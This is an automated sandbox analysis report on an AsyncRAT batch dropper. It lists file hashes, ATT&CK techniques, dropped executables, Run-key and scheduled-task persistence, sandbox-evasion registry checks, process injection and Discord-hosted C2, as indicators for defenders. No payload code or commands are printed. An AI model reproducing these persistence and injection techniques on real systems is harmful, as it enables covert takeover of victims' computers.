asyncrat | 37f0f3680bd1eb5c157783175e2e27706c87ad3968366cd849599c8f10e494f3

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
17-06-2024 21:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dropper_1.bat
Size

4KB
MD5

e0defb53b0356203d8b434deeefe5915
SHA1

a8451249841e6644fee5749c3fce921a0a5e3442
SHA256

37f0f3680bd1eb5c157783175e2e27706c87ad3968366cd849599c8f10e494f3
SHA512

5c1a63000547fb8420e9d61e36b759ca2ee920e833c250233055364111d1b8712587b17a85cfbd1d807309b4ce932600c77dfecd0c8c88808a950a97f48cb45e
SSDEEP

48:61jKP/WlIqQ9+iCObFg/7gGcK+hrZahJUrSXYSlDI6p8536anO6jiF6ydr6o3SqB:ZP/HVbxaLUrCcKoit

Score

10^/10

asyncrat persistence rat

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 4176 created 624 4176 powershell.EXE winlogon.exe

description	pid	process	target process
PID 4176 created 624	4176	powershell.EXE	winlogon.exe

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Windows\Resources\$77-scchost.exe	family_asyncrat

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

$77-scchost.exe$77-sdchost.exe$77-penisware.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	$77-scchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	$77-sdchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	$77-penisware.exe

Executes dropped EXE 10 IoCs

Processes:

$77-sdchost.exe$77-scchost.exe$77-penisware.exe$77-penisware2.exe$77-install.exe$77-penisware2.exe$77-penisware.exe$77-scchost.exe$77-penisware.exe$77-scchost.exe

pid	process
464	$77-sdchost.exe
5012	$77-scchost.exe
3988	$77-penisware.exe
3104	$77-penisware2.exe
632	$77-install.exe
4568	$77-penisware2.exe
3432	$77-penisware.exe
2124	$77-scchost.exe
2484	$77-penisware.exe
4724	$77-scchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

$77-sdchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe"	$77-sdchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

2 discord.com
1 discord.com

flow	ioc
2	discord.com
1	discord.com

Drops file in System32 directory 13 IoCs

Processes:

svchost.exesvchost.exesvchost.exepowershell.EXEOfficeClickToRun.exe$77-penisware2.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\$77-scchost	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf	$77-penisware2.exe
File opened for modification	C:\Windows\System32\Tasks\$77-penisware	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 4176 set thread context of 1248 4176 powershell.EXE dllhost.exe

description	pid	process	target process
PID 4176 set thread context of 1248	4176	powershell.EXE	dllhost.exe

Drops file in Windows directory 5 IoCs

Processes:

curl.execurl.execurl.execurl.execurl.exe

description	ioc	process
File created	C:\Windows\Resources\$77-install.exe	curl.exe
File created	C:\Windows\Resources\$77-sdchost.exe	curl.exe
File created	C:\Windows\Resources\$77-scchost.exe	curl.exe
File created	C:\Windows\Resources\$77-penisware.exe	curl.exe
File created	C:\Windows\Resources\$77-penisware2.exe	curl.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 26 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

RuntimeBroker.exewmiprvse.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	RuntimeBroker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	RuntimeBroker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	RuntimeBroker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	RuntimeBroker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	RuntimeBroker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

5080 schtasks.exe
748 schtasks.exe
964 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

3728 timeout.exe
4924 timeout.exe
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

wmiprvse.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe

pid	process
5080	schtasks.exe
748	schtasks.exe
964	schtasks.exe

pid	process
3728	timeout.exe
4924	timeout.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 60 IoCs

Processes:

OfficeClickToRun.exepowershell.EXEdllhost.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={309BFA4C-A965-47D1-A403-C0CA54BD5CBE}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 17 Jun 2024 21:34:37 GMT"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	dllhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	dllhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718660075"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe

Modifies registry class 7 IoCs

Processes:

RuntimeBroker.exeRuntimeBroker.exeExplorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE

Runs regedit.exe 1 IoCs

Processes:

regedit.exe

pid process

4624 regedit.exe

pid	process
4624	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

$77-penisware2.exepowershell.EXE$77-scchost.exedllhost.exe$77-penisware2.exe

pid	process
3104	$77-penisware2.exe
3104	$77-penisware2.exe
4176	powershell.EXE
5012	$77-scchost.exe
4176	powershell.EXE
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
5012	$77-scchost.exe
4176	powershell.EXE
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
4568	$77-penisware2.exe
4568	$77-penisware2.exe
4568	$77-penisware2.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe
1248	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

regedit.exe

pid process

4624 regedit.exe

pid	process
4624	regedit.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

$77-penisware2.exe$77-scchost.exepowershell.EXEdllhost.exe$77-penisware.exe$77-sdchost.exe$77-penisware2.exeExplorer.EXEsvchost.exewmiprvse.exesvchost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	3104	$77-penisware2.exe
Token: SeDebugPrivilege	5012	$77-scchost.exe
Token: SeDebugPrivilege	4176	powershell.EXE
Token: SeDebugPrivilege	5012	$77-scchost.exe
Token: SeDebugPrivilege	4176	powershell.EXE
Token: SeDebugPrivilege	1248	dllhost.exe
Token: SeDebugPrivilege	3988	$77-penisware.exe
Token: SeDebugPrivilege	464	$77-sdchost.exe
Token: SeDebugPrivilege	4568	$77-penisware2.exe
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeDebugPrivilege	3988	$77-penisware.exe
Token: SeDebugPrivilege	464	$77-sdchost.exe
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2552	svchost.exe
Token: SeIncreaseQuotaPrivilege	2552	svchost.exe
Token: SeSecurityPrivilege	2552	svchost.exe
Token: SeTakeOwnershipPrivilege	2552	svchost.exe
Token: SeLoadDriverPrivilege	2552	svchost.exe
Token: SeSystemtimePrivilege	2552	svchost.exe
Token: SeBackupPrivilege	2552	svchost.exe
Token: SeRestorePrivilege	2552	svchost.exe
Token: SeShutdownPrivilege	2552	svchost.exe
Token: SeSystemEnvironmentPrivilege	2552	svchost.exe
Token: SeUndockPrivilege	2552	svchost.exe
Token: SeManageVolumePrivilege	2552	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2552	svchost.exe
Token: SeIncreaseQuotaPrivilege	2552	svchost.exe
Token: SeSecurityPrivilege	2552	svchost.exe
Token: SeTakeOwnershipPrivilege	2552	svchost.exe
Token: SeLoadDriverPrivilege	2552	svchost.exe
Token: SeSystemtimePrivilege	2552	svchost.exe
Token: SeBackupPrivilege	2552	svchost.exe
Token: SeRestorePrivilege	2552	svchost.exe
Token: SeShutdownPrivilege	2552	svchost.exe
Token: SeSystemEnvironmentPrivilege	2552	svchost.exe
Token: SeUndockPrivilege	2552	svchost.exe
Token: SeManageVolumePrivilege	2552	svchost.exe
Token: SeDebugPrivilege	3912	wmiprvse.exe
Token: SeAuditPrivilege	2080	svchost.exe
Token: SeAuditPrivilege	2560	svchost.exe
Token: SeAuditPrivilege	2560	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2552	svchost.exe
Token: SeIncreaseQuotaPrivilege	2552	svchost.exe
Token: SeSecurityPrivilege	2552	svchost.exe
Token: SeTakeOwnershipPrivilege	2552	svchost.exe
Token: SeLoadDriverPrivilege	2552	svchost.exe
Token: SeSystemtimePrivilege	2552	svchost.exe
Token: SeBackupPrivilege	2552	svchost.exe
Token: SeRestorePrivilege	2552	svchost.exe
Token: SeShutdownPrivilege	2552	svchost.exe
Token: SeSystemEnvironmentPrivilege	2552	svchost.exe
Token: SeUndockPrivilege	2552	svchost.exe
Token: SeManageVolumePrivilege	2552	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2552	svchost.exe
Token: SeIncreaseQuotaPrivilege	2552	svchost.exe
Token: SeSecurityPrivilege	2552	svchost.exe
Token: SeTakeOwnershipPrivilege	2552	svchost.exe
Token: SeLoadDriverPrivilege	2552	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Explorer.EXE

pid process

3448 Explorer.EXE
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

$77-penisware2.exe$77-penisware2.exe

pid process

3104 $77-penisware2.exe
4568 $77-penisware2.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

